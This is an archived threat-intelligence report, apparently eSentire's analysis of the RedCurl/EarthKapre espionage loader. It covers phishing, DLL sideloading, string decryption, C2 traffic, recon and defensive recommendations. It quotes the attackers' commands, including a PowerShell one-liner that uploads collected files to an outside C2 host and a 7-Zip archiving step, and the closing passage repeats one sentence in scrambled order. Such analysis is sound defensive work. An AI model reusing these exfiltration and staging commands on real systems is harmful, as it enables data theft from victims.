{ "id": "2b2dde75-b965-4c66-8792-29edd9643769", "created_at": "2026-04-06T00:19:52.817159Z", "updated_at": "2026-04-10T03:30:34.688738Z", "deleted_at": null, "sha1_hash": "18d578ca9d7b9eb8703328ab28b70a9ba3030220", "title": "Unraveling the Many Stages and Techniques Used by RedCurl/EarthKapre APT", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1921545, "plain_text": "Unraveling the Many Stages and Techniques Used by\r\nRedCurl/EarthKapre APT\r\nBy eSentire Threat Response Unit (TRU)\r\nArchived: 2026-04-05 17:50:30 UTC\r\nAdversaries don’t work 9-5 and neither do we. At eSentire, our 24/7 SOCs are staffed with Elite Threat Hunters\r\nand Cyber Analysts who hunt, investigate, contain and respond to threats within minutes.\r\nWe have discovered some of the most dangerous threats and nation state attacks in our space – including the\r\nKaseya MSP breach and the more_eggs malware.\r\nOur Security Operations Centers are supported with Threat Intelligence, Tactical Threat Response and Advanced\r\nThreat Analytics driven by our Threat Response Unit – the TRU team.\r\nIn TRU Positives, eSentire’s Threat Response Unit (TRU) provides a summary of a recent threat investigation. We\r\noutline how we responded to the confirmed threat and what recommendations we have going forward.\r\nHere’s the latest from our TRU Team…\r\nWhat did we find?\r\nIn January 2025, the eSentire Threat Response Unit (TRU) identified the use of a legitimate Adobe executable\r\n(ADNotificationManager.exe) to sideload the EarthKapre/RedCurl loader.\r\nEarthKapre, also known as RedCurl, is a highly sophisticated cyber espionage group known for its advanced\r\noperations, primarily targeting private-sector organizations with a focus on corporate espionage. The target of this\r\nattack is an organization within the Law Firms \u0026 Legal Services industry.\r\nUpon execution of the final stage, TRU observed EarthKapre executing reconnaissance commands and tools like\r\nSysInternals Active Directory Explorer (AD Explorer), the usage of 7-Zip to password protect/archive the\r\ncollected data, and exfiltration to cloud storage provider “Tab Digital” via PowerShell PUT request.\r\nInitial access occurred when the victim opened an Indeed CV/Cover letter themed spam PDF from a spam email.\r\nThe PDF contains a link to download a zip archive, which contains a mountable iso (img) file. Once the victim\r\nopens the img file, it is mounted to an external drive letter, e.g. D: and opens in file explorer.\r\nThe victim sees a single file, “CV Applicant *.scr” which is the legitimate signed Adobe executable\r\n“ADNotificationManager.exe”. After the victim opens the file, the EarthKapre loader (netutils.dll) is side loaded.\r\nThis attack chain is described in the figure below.\r\nhttps://www.esentire.com/blog/unraveling-the-many-stages-and-techniques-used-by-redcurl-earthkapre-apt\r\nPage 1 of 21\n\nFigure 1 – EarthKapre/RedCurl Attack Chain\r\nThe PDF file contains two links that lead to a zip archive containing an ISO image file matching, \"CV Applicant\r\n[4 digits]-[6 digits].img”.\r\nFigure 2 – Indeed-themed phishing pdf\r\nAfter extracting the zip archive and mounting the img file, the victim sees a file explorer window. Note, the victim\r\nwould not see any of the hidden files shown below as the default setting in Windows hides hidden files. The only\r\nfile the victim sees is “CV Application *.scr”.\r\nUpon the victim opening the *.scr file, the RedCurl/EarthKapre dll (netutils.dll) is side loaded. The legitimate C\r\nruntime libraries shown below are also loaded.\r\nhttps://www.esentire.com/blog/unraveling-the-many-stages-and-techniques-used-by-redcurl-earthkapre-apt\r\nPage 2 of 21\n\nFigure 3 – File explorer view after mounting img file\r\nStage 1 Analysis\r\nBefore we dive into the analysis of the first stage, aka Simple Downloader, it is worth noting there are few\r\ndetections in VirusTotal for this particular variant.\r\nFigure 4 – Low VirusTotal hits\r\nThe purpose of the first stage is to download and execute the next stage. As previously reported by Trend Micro,\r\nRedCurl/EarthKapre makes use of a string decryption function that makes use of various APIs in bcrypt.dll. These\r\nAPIs are used to generate a SHA256 hash based on a string. The first 16 bytes of the generated SHA256 hash is\r\nused as the AES key for decrypting strings via BCryptDecrypt:\r\nBCryptOpenAlgorithmProvider – AES/SHA256\r\nBCryptCreateHash\r\nBCryptHashData\r\nBCryptDestroyHash\r\nBCryptGenerateSymmetricKey – Generate key for AES\r\nBCryptFinishHash – Acquire SHA256 of key string\r\nhttps://www.esentire.com/blog/unraveling-the-many-stages-and-techniques-used-by-redcurl-earthkapre-apt\r\nPage 3 of 21\n\nBCryptDecrypt – Decrypt encrypted string\r\nBCryptGetProperty – ObjectLength and HashDigestLength properties\r\nBCryptDestroyKey\r\nBCryptCloseAlgorithmProvider\r\nThe string used in the aforementioned process is XOR encrypted. The routine that handles decryption of it is\r\ncalled with several parameters, passing a pointer to store the decrypted key, a pointer to the encrypted key, and the\r\nXOR key 0x0D0196A9 to use for decryption.\r\nNote, this routine is used throughout several stages of RedCurl/EarthKapre and not just this particular stage. It is\r\nalso used for decrypting other strings as well and not just the key string.\r\nFigure 5 – AES key decryption\r\nThe encryption routine can be seen below. Each index of the encrypted data is decrypted by multiplying the\r\nconstant 48271 by the previous computation and XOR’ing against the encrypted byte.\r\nFigure 6 – XOR decryption routine\r\nAfter the AES key string is decrypted, it is used throughout for decrypting strings. The next figure displays part of\r\nhow this is achieved.\r\nFirst, a SHA256 is generated from the key string and 16 bytes of the resulting hash are used in a call to\r\nBCryptDecrypt.\r\nhttps://www.esentire.com/blog/unraveling-the-many-stages-and-techniques-used-by-redcurl-earthkapre-apt\r\nPage 4 of 21\n\nFigure 7 – AES decryption routine\r\nTo make understanding the code easier, we wrote a python script that is available here to find the AES key,\r\ndecrypt all the strings, and set comments in IDA Pro.\r\nNote, the Yara rules may need to be updated across future variants to capture the appropriate opcodes. For this\r\nparticular variant, all of the strings are decrypted and output in IDA as seen below. These strings include various\r\nAPI names, a C2 URL (sm.vbigdatasolutions.workers[.]dev) and a user agent utilized for acquiring the next stage.\r\nRemembering that the initial PDF was Indeed themed, the string “https://secure.indeed.com/auth” is passed in a\r\ncall to the API ShellExecuteA to deceive the user by opening their default browser to that URL.\r\nFigure 8 – Decrypting strings via EarthKapre-IDA.py\r\nOne of the first behaviors in the stage is to create a scheduled task via COM interface (taskschd.dll). The trigger\r\ntime is generated via Windows API GetSystemTimeAsFileTime, which is then converted to the time in seconds\r\nsince epoch. The time is then converted to string format via strftime with format specifier, \"%Y-%m-\r\n%dT%H:%M:%S\".\r\nFigure 9 – Generate time for scheduled task to trigger\r\nhttps://www.esentire.com/blog/unraveling-the-many-stages-and-techniques-used-by-redcurl-earthkapre-apt\r\nPage 5 of 21\n\nNote, that because the trigger time for the task is a time that technically occurs in the past by the time the task is\r\ncreated, it is not immediately triggered. The task is set to run every hour indefinitely, so the actual time the next\r\nstage is set to run is one hour after.\r\nThe threat actors are still using the LOLBin Program Compatibility Assistant (pcalua.exe) for the next stage,\r\nwhich in turn will execute the “CplApplet” export via rundll32.exe.\r\nThe \"action\" for the task is as follows:\r\nAction: Start a Program\r\nDetails: C:\\Windows\\system32\\pcalua.exe -a rundll32 -c shell32.dll,Control_RunDLL\r\nC:\\Users\\User\\AppData\\Roaming\\BrowserOSR\\BrowserOSR_.dll c7ccd991-41e1-45ab-b0de-b1d229bba429\r\nThe following figure displays the name of the scheduled task, which follows the format BrowserOSR-\r\n\u003cBASE64_ENCODED_COMPUTER_NAME\u003e.\r\nNote, the computer name is acquired through the API GetComputerNameA. One additional thing to note is that\r\nthis task is not stored in the root but rather its own folder “BrowserOSR” and uses the author “Google\r\nCorporation”.\r\nFigure 10 – Scheduled task properties\r\nWininet.dll is then loaded and several APIs are resolved:\r\nInternetOpenA\r\nInternetConnectA\r\nHttpOpenRequestA\r\nHttpSendRequestA\r\nHttpQueryInfoA\r\nThese APIs are used by the malware to send an HTTP request to the C2 to acquire the next stage. The contents of\r\nthis HTTP request can be seen below. Note, the user agent changes across variants. For example, the user agent\r\n“Mozilla/5.0 (Windows NT; Windows NT 10.0;) WindowsPowerShell/5.1.20134.790” was seen in a previous\r\nvariant.\r\nPOST /id HTTP/1.1\r\nContent-type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0;) WindowsPowerShell/5.1 (VuMUAsryhPLsaqGXlSx)\r\nHost: sm.vbigdatasolutions[.]workers.dev\r\nhttps://www.esentire.com/blog/unraveling-the-many-stages-and-techniques-used-by-redcurl-earthkapre-apt\r\nPage 6 of 21\n\nContent-Length: 0\r\nCache-Control: no-cache\r\nFigure 11 – First stage C2 HTTP request\r\nThe following figure shows the response from the C2 which contains the encrypted second stage payload. Note,\r\nthe file name in the Content-Disposition header is set to a randomly named zip archive however the response\r\ncontents are clearly missing the right header to be a zip archive.\r\nFigure 12 – First stage C2 HTTP response\r\nThe API InternetReadFile is called in a loop to read the response from the HTTP request in chunks of 0x2800\r\nbytes until InternetReadFile returns FALSE. This response contains an encrypted DLL payload. The payload\r\nreturned by the C2 in this case is 0x428A0 bytes, so the InternetReadFile API is called around 26 times.\r\nhttps://www.esentire.com/blog/unraveling-the-many-stages-and-techniques-used-by-redcurl-earthkapre-apt\r\nPage 7 of 21\n\nFigure 13 – Read response from C2 in chunks of 0x2800 bytes\r\nWe have re-implemented the decryption process in the python script available here. Note, the first stage binary,\r\ni.e., netutils.dll, needs to be passed to the script for the script to identify the XOR key to decrypt the encrypted\r\npayload, e.g., encrypted_payload.bin.\r\nFigure 14 – Decrypting the C2 encrypted response via EarthKapre-Stage2-Payload-Decrypter.py\r\nNext, the string \"CreateDirectoryA\" is decrypted and resolved via GetProcAddress. Then, the string \"WriteFile\" is\r\ndecrypted and resolved via GetProcAddress. After that, the string \"CreateFileA\" is decrypted and resolved via\r\nGetProcAddress. Then, the string \"CloseHandle\" is decrypted and resolved via GetProcAddress.\r\nNext, CreateDirectoryA is called to create the folder to store the payload.\r\nC:\\Users\\user\\AppData\\Roaming\\BrowserOSR After that, CreateFileA is called with GENERIC_WRITE access\r\nto create a handle to the final stage. The payload is then decrypted via an XOR loop with the hard-coded XOR key\r\n\"BmaEiOwsUa\". The beginning of the decrypted blob contains 0x1869F junk bytes.\r\nAfter incrementing the pointer to the payload buffer 0x186A0 bytes, the payload is written to disk through a call\r\nto WriteFile. Finally, after the scheduled task triggers after an hour, stage 2 executes.\r\nhttps://www.esentire.com/blog/unraveling-the-many-stages-and-techniques-used-by-redcurl-earthkapre-apt\r\nPage 8 of 21\n\nFigure 15 – Decrypting the C2 encrypted response via XOR key, write payload to disk\r\nFigure 16 – Decrypted payload preview in hex editor\r\nStage 2 Analysis\r\nThe same string decryption techniques described in the first stage are used again, but the key for AES decryption\r\nis derived differently. The first part of the key string is acquired through XOR decryption like before, however the\r\nGUID that was passed when this stage was executed is concatenated with this string e.g.,\r\n\"CnWX8J4d5Wizuwc7ccd991-41e1-45ab-b0de-b1d229bba429\".\r\nBecause of this, sandboxes that rely on executing all known exports of the DLL will fail to detonate this stage\r\nproperly.\r\nhttps://www.esentire.com/blog/unraveling-the-many-stages-and-techniques-used-by-redcurl-earthkapre-apt\r\nPage 9 of 21\n\nFigure 17 – Decrypting stage 2 strings via EarthKapre-IDA.py\r\nThe first decrypted string we will talk about is “www.msn.com”. This is used to see if the victim machine has\r\ninternet, otherwise the malware will exit. Note, TRU has observed other domains used in this process such as\r\nbing.com as well. The HTTP request contents are as follows. If the response code is less than 400, internet is\r\nconsidered to be available.\r\nGET https://www.msn.com/ HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Sa\r\nPragma: no-cache\r\nHost: www.msn.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\nFigure 18 – Internet availability check via msn.com\r\nNext, the malware resolves the victim's username via the GetUserNameA API and computer name via the\r\nGetComputerNameA API. This is followed by getting the directory paths for Program Files, Desktop, and Local\r\nAppData via the SHGetSpecialFolderPathA API.\r\nFigure 19 – Get Program Files, Desktop, and Local AppData paths\r\nThe malware then calls the API SetFileApisToOEM for the process to use the OEM character set code page, then\r\nproceeds to get all file and directory names in Program Files, Desktop, and Local AppData via API calls to\r\nhttps://www.esentire.com/blog/unraveling-the-many-stages-and-techniques-used-by-redcurl-earthkapre-apt\r\nPage 10 of 21\n\nFindFirstFileA and FindNextFileA. The resulting data is concatenated with new lines.\r\nNext, the malware generates an XOR key to use for encrypting the HTTP request payload’s values. The routine\r\nthat generates the key is a string generator that makes use of the rand() function.\r\nNote, the seed is set to the current process ID multiplied by a constant. With this particular sample, the constant\r\nwas 0x679BCF5C.\r\nFigure 20 – Setting seed via srand\r\nThe HTTP request payload contains several key/value pairs containing the victim's computer name, username,\r\nenumerated files/directories, the final stage’s export to be called, and finally the XOR key used to encrypt each\r\nvalue in the key/value pairs. Note, some of the key values are hard-coded or empty. Note, the key names, i.e.\r\n“wbpslyzvnir” are generated using the previously mentioned string generator.\r\nPOST https://community.rmobileappdevelopment.workers[.]dev/ HTTP/1.1\r\nContent-type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Sa\r\nHost: community.rmobileappdevelopment.workers[.]dev\r\nContent-Length: 1166\r\nCache-Control: no-cache\r\nwbpslyzvnir=\u0026mplya=\u0026dfdxkzkvbuqtxb=\u0026ndpqpeqwcxbbltixpw=1\u0026thtpupwphzvzd==\u0026waqjikiphmzl=\u0026ggzykfgzwoavgyss=\r\nFigure 21 – Stage 2 C2 request\r\nThe routine responsible for encrypting the values has been decompiled and can be seen below.\r\nhttps://www.esentire.com/blog/unraveling-the-many-stages-and-techniques-used-by-redcurl-earthkapre-apt\r\nPage 11 of 21\n\nFigure 22 – XOR encryption routine\r\nThe random string generator routine can be seen below. As stated before, this generator is used to generate the\r\nXOR key, as well as the random strings used as keys in the request payload. The rand() function is called in a\r\nloop, and the result is mod’d with 0x1A and the result is added to 0x61.\r\nhttps://www.esentire.com/blog/unraveling-the-many-stages-and-techniques-used-by-redcurl-earthkapre-apt\r\nPage 12 of 21\n\nFigure 23 – Random string generator routine\r\nEach value of the HTTP request is then base64 encoded. Note, the base64 encoding routine complies with “Base\r\n64 Encoding with URL and Filename Safe Alphabet” defined in RFC 4648, which has the following character set:\r\n ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-\r\nFigure 24 – Base64 character set\r\nAfter decoding from base64 and decrypting each value with the XOR key in the HTTP request payload, we can\r\nsee what the threat actors receive on their end: the victim’s username, computer name, and files/directories from\r\nthe victim’s Desktop, Local AppData, and Program Files folders.\r\nhttps://www.esentire.com/blog/unraveling-the-many-stages-and-techniques-used-by-redcurl-earthkapre-apt\r\nPage 13 of 21\n\nFigure 25 – Decrypted HTTP request contents\r\nIf the request to the C2 was successful, the string \"IsDebuggerPresent\" is then decrypted and resolved via\r\nGetProcAddress. It is then called to check if a debugger is present. If the check fails, the process exits. Otherwise,\r\na random string is generated and \".tmp\" is concatenated to it.\r\nThe C2 response is then checked via HttpQueryInfoA, passing the flags HTTP_QUERY_FLAG_NUMBER and\r\nHTTP_QUERY_CONTENT_LENGTH. The content length is checked to ensure it is greater than 10 bytes. If so,\r\nInternetReadFile is called in a loop, reading in chunks of 0x2800 bytes again like in the first stage.\r\nThe response data is then written to the current directory and the random string + \".tmp\". This is achieved through\r\nthe APIs: GetCurrentDirectoryA, CreateFileA, and WriteFile.\r\nhttps://www.esentire.com/blog/unraveling-the-many-stages-and-techniques-used-by-redcurl-earthkapre-apt\r\nPage 14 of 21\n\nFigure 26 – Check for debugger and exit\r\nThe aforementioned payload is then loaded via LoadLibraryA and the stage 3 export \"IfIxStId\" is resolved via\r\nGetProcAddress and is invoked through a call instruction. Finally, as an evasive measure, DeleteFileA() is then\r\ncalled to delete the third stage file from disk.\r\nNote, the stage 3 export name can be found as a decrypted string in this stage or found passed as a value in the\r\nHTTP request payload.\r\nFigure 27 – Execute third stage retrieved from C2\r\nPutting everything together, we have created the following collection of scripts:\r\nEarthKapre-Stage1-C2.py - Simulate the request to the C2 to get the second stage.\r\nFigure 28 – Running EarthKapre-Stage1-C2.py to download second stage\r\nEarthKapre-Stage2-Payload-Decrypter.py - Decrypt the resulting encrypted payload acquired after running\r\nEarthKapre-Stage1-C2.py.\r\nhttps://www.esentire.com/blog/unraveling-the-many-stages-and-techniques-used-by-redcurl-earthkapre-apt\r\nPage 15 of 21\n\nFigure 29 – Running EarthKapre-Stage2-Payload-Decrypter.py to decrypt encrypted second stage\r\nEarthKapre-Stage2-C2-Request-Decrypter.py - Parses a given byte string containing the stage 2 request\r\npayload and outputs the decrypted victim computer name, username, files/directories listings, and XOR\r\nkey.\r\nFigure 30 – Running EarthKapre-Stage2-C2-Request-Decrypter.py to decrypt HTTP request\r\npayload\r\nEarthKapre-Stage2-C2.py - Sends a request to the C2 to retrieve the third stage.\r\nFigure 31 – Running EarthKapre-Stage2-C2.py to get third stage payload\r\nReconnaissance and Exfiltration\r\nRedCurl executed the following commands via a batch file dropped by the final stage into\r\n%APPDATA%\\Acquisition\\JKLYjn2.bat. This batch file is used to automate the collection of system information\r\nfor reconnaissance purposes and to archive collected data for exfiltration:\r\nGet user account information:\r\nnet localgroup\r\nnet localgroup Administrators\r\nGet system information:\r\nsysteminfo\r\nGet information about disks on the system:\r\nhttps://www.esentire.com/blog/unraveling-the-many-stages-and-techniques-used-by-redcurl-earthkapre-apt\r\nPage 16 of 21\n\nwmic logicaldisk get description,name,Size,FreeSpace\r\nGet information about installed Anti-virus products:\r\nwmic process get Name,Commandline powershell -c \"Get-CimInstance -Namespace\r\nroot/SecurityCenter2 -ClassName AntivirusProduct | Out-File -FilePath .\\temp7237\\\r\n\u003cCOMPROMISED_COMPUTER_NAME\u003e_AV.txt\"\r\nExecute Sysinternals AD Explorer and output results to temp file:\r\ntemp7237\\ad.exe -accepteula -snapshot \"\" temp7237\\dmn.dat\r\nExecute 7-Zip to archive collected data with a password for encryption:\r\npowershell -c \"gci .*.exe | foreach {if(($.VersionInfo).InternalName -eq '7za'){$syspack =\r\n$.Fullname}};$a1='x';$a2='-aoa';$a3='-p'+$env:ppass2;$a4=$env:util;$a5='-o'+$env:tdir;\u0026$syspack\r\n$a1 $a2 $a3 $a4 $a5;\"\r\nUpload the collected data via PowerShell PUT request to C2 “mia.nl.tab[.]digital”:\r\npowershell -c \"$PSW01 = New-Object -ComObject MSXML2.ServerXMLHTTP;$AFS = New-Object -ComObject ADODB.Stream;$AFS.Open();$AFS.Type = 1;Get-ChildItem .$env:trdir |\r\nWhere-Object {$.PSIsContainer -eq $false;} | foreach {$AFS.LoadFromFile($.FullName);$AFB =\r\n$AFS.Read();$PSW01.Open('PUT', $env:davstr+'/'+$env:davfld+'/'+$_.Name, $False, $env:slog,\r\n$env:spass);$PSW01.Send($AFB);};$PSW01.Close;\"\r\nWorkers.dev\r\nThe C2 infrastructure is hosted by Cloudflare through Cloudflare Workers. According to Cloudflare, “Cloudflare\r\nWorkers provides a serverless execution environment that allows you to create new applications or augment\r\nexisting ones without configuring or maintaining infrastructure.”\r\nUnfortunately for RedCurl, there are some limitations to Cloudflare Workers free tier - the threat actors are only\r\nable to receive 100,000 requests per day. Through slight modification of EarthKapre-Stage2-C2.py, we were able\r\nto cause the C2 to fail to return a response and ended up limiting all the other subdomains used in this attack as\r\nwell.\r\nhttps://www.esentire.com/blog/unraveling-the-many-stages-and-techniques-used-by-redcurl-earthkapre-apt\r\nPage 17 of 21\n\nFigure 32 – Cloudflare Workers limits\r\nWhat did we do?\r\nOur team of 24/7 SOC Cyber Analysts proactively isolated the affected host to contain the infection on the\r\ncustomer’s behalf.\r\nWe communicated what happened with the customer and helped them with incident remediation efforts.\r\nRecommendations from the Threat Response Unit (TRU):\r\nPrevent automatic mounting of ISO/IMG by Group Policy:\r\nCreate a new GPO policy or edit an existing one and enable the following policy: Computer\r\nConfiguration \u003e Administrative Templates \u003e System \u003e Device Installation \u003e Device Installation\r\nRestrictions.\r\nClick the Show... button and copy/paste the value shown below\r\nSCSI\\CdRomMsft____Virtual_DVD-ROM_\r\nEnsure the checkbox \"Also apply to matching devices that are already installed.\" is selected.\r\nNote: when linking the GPO to an OU, the OU must be computer based as this policy is\r\nComputer Configuration based.\r\nUse an Endpoint Detection and Response (EDR) solution and ensure it is deployed across all workstations\r\nand servers.\r\nhttps://www.esentire.com/blog/unraveling-the-many-stages-and-techniques-used-by-redcurl-earthkapre-apt\r\nPage 18 of 21\n\nIndicators of Compromise\r\nYou can access the Indicators of Compromise here.\r\nReferences\r\nhttps://go.group-ib.com/report-redcurl-en\r\nhttps://www.trendmicro.com/en_ca/research/24/c/unveiling-earth-kapre-aka-redcurls-cyberespionage-tactics-with-t.html\r\nhttps://www.huntress.com/blog/the-hunt-for-redcurl-2\r\nhttps://lolbas-project.github.io/lolbas/Binaries/Pcalua/\r\nhttps://learn.microsoft.com/en-us/sysinternals/downloads/adexplorer\r\nTo learn how your organization can build cyber resilience and prevent business disruption with eSentire’s Next\r\nLevel MDR, connect with an eSentire Security Specialist now.\r\nhttps://www.esentire.com/blog/unraveling-the-many-stages-and-techniques-used-by-redcurl-earthkapre-apt\r\nPage 19 of 21\n\nGET STARTED\r\nABOUT ESENTIRE’S THREAT RESPONSE UNIT (TRU)\r\nThe eSentire Threat Response Unit (TRU) is an industry-leading threat research team committed to helping your\r\norganization become more resilient. TRU is an elite team of threat hunters and researchers that supports our 24/7\r\nSecurity Operations Centers (SOCs), builds threat detection models across the eSentire XDR Cloud Platform, and\r\nworks as an extension of your security team to continuously improve our Managed Detection and Response\r\nservice. By providing complete visibility across your attack surface and performing global threat sweeps and\r\nproactive hypothesis-driven threat hunts augmented by original threat research, we are laser-focused on defending\r\nyour organization against known and unknown threats.\r\nhttps://www.esentire.com/blog/unraveling-the-many-stages-and-techniques-used-by-redcurl-earthkapre-apt\r\nPage 20 of 21\n\nSource: https://www.esentire.com/blog/unraveling-the-many-stages-and-techniques-used-by-redcurl-earthkapre-apt\r\nhttps://www.esentire.com/blog/unraveling-the-many-stages-and-techniques-used-by-redcurl-earthkapre-apt\r\nPage 21 of 21\n\nThe API InternetReadFile bytes until InternetReadFile is called returns in a loop to FALSE. This read the response response contains from the an encrypted HTTP request DLL payload. in chunks of The payload 0x2800\nreturned by the C2 in this case is 0x428A0 bytes, so the InternetReadFile API is called around 26 times.\n Page 7 of 21", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "references": [ "https://www.esentire.com/blog/unraveling-the-many-stages-and-techniques-used-by-redcurl-earthkapre-apt" ], "report_names": [ "unraveling-the-many-stages-and-techniques-used-by-redcurl-earthkapre-apt" ], "threat_actors": [ { "id": "08c8f238-1df5-4e75-b4d8-276ebead502d", "created_at": "2023-01-06T13:46:39.344081Z", "updated_at": "2026-04-10T02:00:03.294222Z", "deleted_at": null, "main_name": "Copy-Paste", "aliases": [], "source_name": "MISPGALAXY:Copy-Paste", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "6ec2cd63-307d-4281-86da-5dc199e932af", "created_at": "2025-08-07T02:03:24.821494Z", "updated_at": "2026-04-10T02:00:03.843522Z", "deleted_at": null, "main_name": "GOLD BLADE", "aliases": [ "Earth Kapre ", "Red Wolf ", "RedCurl " ], "source_name": "Secureworks:GOLD BLADE", "tools": [ "RedLoader" ], "source_id": "Secureworks", "reports": null }, { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "f72f2981-0dc4-4d96-857c-a725a143a538", "created_at": "2024-03-21T02:00:04.724563Z", "updated_at": "2026-04-10T02:00:03.602417Z", "deleted_at": null, "main_name": "Earth Kapre", "aliases": [ "RedCurl", "Red Wolf", "GOLD BLADE" ], "source_name": "MISPGALAXY:Earth Kapre", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "79e95381-8008-48dc-b981-fd66e1c46ca6", "created_at": "2022-10-25T16:07:24.110478Z", "updated_at": "2026-04-10T02:00:04.869039Z", "deleted_at": null, "main_name": "RedCurl", "aliases": [ "Earth Kapre", "Red Wolf" ], "source_name": "ETDA:RedCurl", "tools": [ "Impacket", "LaZagne" ], "source_id": "ETDA", "reports": null }, { "id": "8108d548-e30f-4b90-aa60-71323ba66678", "created_at": "2024-11-01T02:00:52.667098Z", "updated_at": "2026-04-10T02:00:05.343786Z", "deleted_at": null, "main_name": "RedCurl", "aliases": [ "RedCurl" ], "source_name": "MITRE:RedCurl", "tools": null, "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434792, "ts_updated_at": 1775791834, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/18d578ca9d7b9eb8703328ab28b70a9ba3030220.pdf", "text": "https://archive.orkl.eu/18d578ca9d7b9eb8703328ab28b70a9ba3030220.txt", "img": "https://archive.orkl.eu/18d578ca9d7b9eb8703328ab28b70a9ba3030220.jpg" } }